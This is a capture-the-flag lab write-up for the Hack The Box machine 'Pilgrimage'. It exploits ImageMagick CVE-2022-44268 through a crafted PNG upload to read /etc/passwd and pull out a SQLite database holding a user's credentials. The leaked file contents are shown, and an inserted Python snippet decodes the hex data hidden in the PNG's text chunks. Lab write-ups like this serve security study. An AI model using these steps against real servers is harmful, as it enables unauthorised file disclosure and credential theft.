File Read


The target web application has its .git directory exposed right at the web root, which let me download a copy of the web application. I found out that the target web app uses ImageMagick in the backend for image processing operations, and the instance is vulnerable to [CVE-2022-44268](https://nvd.nist.gov/vuln/detail/CVE-2022-44268).

The exploit is written in Rust and generates a PNG payload, allowing me to read files on the target system.

Dry-run


┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ cargo run "/etc/passwd"
    Finished dev [unoptimized + debuginfo] target(s) in 0.03s
     Running `target/debug/cve-2022-44268 /etc/passwd`

I will first test it out by attempting to read the /etc/passwd file on the target system.

Uploaded

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ wget -q http://pilgrimage.htb/shrunk/649be69ea03aa.png

I can then grab the converted image.

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ identify -verbose 649be69ea03aa.png
Image:
  Filename: 649be69ea03aa.png
  Format: PNG (Portable Network Graphics)
  Mime type: image/png
  Class: PseudoClass
  Geometry: 100x100+0+0
  Units: Undefined
  Colorspace: sRGB
  Type: Palette
  Base type: Undefined
  Endianness: Undefined
  Depth: 8/1-bit
  Channel depth:
    red: 1-bit
    green: 1-bit
    blue: 1-bit
  Channel statistics:
    Pixels: 10000
    Red:
      min: 255  (1)
      max: 255 (1)
      mean: 255 (1)
      standard deviation: 0 (0)
      kurtosis: 8.192e+51
      skewness: 1e+36
      entropy: 0
    Green:
      min: 0  (0)
      max: 0 (0)
      mean: 0 (0)
      standard deviation: 0 (0)
      kurtosis: -3
      skewness: 0
      entropy: 0
    Blue:
      min: 0  (0)
      max: 0 (0)
      mean: 0 (0)
      standard deviation: 0 (0)
      kurtosis: -3
      skewness: 0
      entropy: 0
  Image statistics:
    Overall:
      min: 0  (0)
      max: 255 (1)
      mean: 85 (0.333333)
      standard deviation: 0 (0)
      kurtosis: -1.5001
      skewness: 0.707071
      entropy: 0
  Colors: 1
  Histogram:
    10000: (255,0,0) #FF0000 red
  Colormap entries: 2
  Colormap:
    0: (255,0,0) #FF0000 red
    1: (255,255,255) #FFFFFF white
  Rendering intent: Perceptual
  Gamma: 0.45455
  Chromaticity:
    red primary: (0.64,0.33)
    green primary: (0.3,0.6)
    blue primary: (0.15,0.06)
    white point: (0.3127,0.329)
  Background color: srgb(99.6124%,99.6124%,99.6124%)
  Border color: srgb(223,223,223)
  Matte color: grey74
  Transparent color: black
  Interlace: None
  Intensity: Undefined
  Compose: Over
  Page geometry: 100x100+0+0
  Dispose: Undefined
  Iterations: 0
  Compression: Zip
  Orientation: Undefined
  Properties:
    date:create: 2023-06-28T07:52:43+00:00
    date:modify: 2023-06-28T07:51:58+00:00
    date:timestamp: 2023-06-28T07:51:58+00:00
    png:bKGD: chunk was found (see Background color, above)
    png:cHRM: chunk was found (see Chromaticity, above)
    png:gAMA: gamma=0.45455 (See Gamma, above)
    png:IHDR.bit-depth-orig: 1
    png:IHDR.bit_depth: 1
    png:IHDR.color-type-orig: 3
    png:IHDR.color_type: 3 (Indexed)
    png:IHDR.interlace_method: 0 (Not interlaced)
    png:IHDR.width,height: 100, 100
    png:PLTE.number_colors: 2
    png:sRGB: intent=0 (Perceptual Intent)
    png:text: 4 tEXt/zTXt/iTXt chunks were found
    png:tIME: 2023-06-28T07:51:58Z
    Raw profile type: 
 
    1437
    [...REDACTED...]
    signature: d02a8da86fec6ef80c209c8437c76cf8fbecb6528cd7ba95ef93eecc52a171c7
  Artifacts:
    filename: 649be69ea03aa.png
    verbose: true
  Tainted: False
  Filesize: 1080B
  Number pixels: 10000
  Pixels per second: 6.68619MB
  User time: 0.000u
  Elapsed time: 0:01.001
  Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org

There is the returned hexstring; I will save it.

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ cat hexstring | xxd -r -p
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false

It’s confirmed. Based on the output, the emily user appears to be the sole user.

DB File


I tried grabbing the user’s SSH private key, but failed, likely due to a lack of privileges, as the web server isn’t running with the privileges of the emily user. Then I realized that I could try enumerating the DB file, whose location was hard-coded into the source code: /var/db/pilgrimage

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ cargo run "/var/db/pilgrimage"
    Finished dev [unoptimized + debuginfo] target(s) in 0.01s
     Running `target/debug/cve-2022-44268 /var/db/pilgrimage`

Generating a payload accordingly

Upload complete

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ wget -q http://pilgrimage.htb/shrunk/649bf0e899f0b.png
 
┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ identify -verbose 649bf0e899f0b.png
 
[...REDACTED...]

Downloading the converted image and saving the hexstring

┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ cat hexstring | tr -d "\n\r" | xxd -r -p > pilgrimage
 
┌──(kali㉿kali)-[~/…/htb/labs/pilgrimage/CVE-2022-44268]
└─$ file pilgrimage
pilgrimage: SQLite 3.x database, last written using SQLite version 3034001, file counter 76, database pages 5, cookie 0x4, schema 4, UTF-8, version-valid-for 76
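Both recoveries above go the same way: `identify -verbose` prints the `Raw profile type` text chunk of the converted image, the hex is saved, and `xxd -r -p` turns it back into the original bytes. The Python below is an added example (not part of this writeup or of the Rust exploit) that does the same directly against the PNG's chunk structure: it walks and CRC-checks the chunks, collects the tEXt/zTXt chunks that `identify` summarises, and decodes ImageMagick's raw-profile hex encoding (wrapped at 72 hex characters per row). The 1x1 PNG and the two passwd lines embedded in it are constructed here and stand in for a downloaded `/shrunk/` image.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def png_chunks(data: bytes):
    """Yield (type, payload) for each chunk, verifying every CRC on the way."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        if zlib.crc32(ctype + payload) != struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]:
            raise ValueError(f"bad CRC on {ctype!r} chunk")
        yield ctype, payload
        pos += 12 + length

def text_chunks(data: bytes) -> dict:
    """Map keyword -> text body for tEXt and zTXt chunks (zTXt is zlib-compressed)."""
    found = {}
    for ctype, payload in png_chunks(data):
        if ctype in (b"tEXt", b"zTXt"):
            key, _, body = payload.partition(b"\x00")
            if ctype == b"zTXt":
                body = zlib.decompress(body[1:])  # body[0] is the compression method
            found[key.decode("latin-1")] = body
    return found

def decode_raw_profile(text: bytes) -> bytes:
    """Undo ImageMagick's '\\n<type>\\n<byte count> \\n<hex rows>' raw-profile encoding."""
    lines = text.split(b"\n")          # [b"", type, count, hex row, hex row, ..., b""]
    declared = int(lines[2])
    blob = bytes.fromhex(b"".join(lines[3:]).decode("ascii"))
    if len(blob) != declared:          # truncated or tampered chunk: refuse to guess
        raise ValueError(f"declared {declared} bytes, decoded {len(blob)}")
    return blob

def recover_profile(png: bytes) -> bytes:
    body = next(v for k, v in text_chunks(png).items() if k.startswith("Raw profile type"))
    return decode_raw_profile(body)

# Constructed sample: a 1x1 grey PNG whose tEXt chunk carries two passwd lines as ImageMagick writes them.
def _chunk(ctype: bytes, payload: bytes) -> bytes:
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload))

SAMPLE_SECRET = b"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
_rows = b"\n".join(SAMPLE_SECRET.hex().encode()[i:i + 72] for i in range(0, len(SAMPLE_SECRET) * 2, 72))
SAMPLE_PNG = (PNG_SIG + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
              + _chunk(b"tEXt", b"Raw profile type \x00\n\n%8d \n" % len(SAMPLE_SECRET) + _rows + b"\n")
              + _chunk(b"IDAT", zlib.compress(b"\x00\x00")) + _chunk(b"IEND", b""))
```

The same `text_chunks` walk is what a defender would run over images leaving a conversion pipeline to confirm they carry no embedded profile text at all, since a benign resize of a user upload has no reason to produce one.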

Done

pilgrimage


The DB contains the users table, with username and password as columns.

The table contains the credential for the emily user.

I will test the credential against the target SSH server.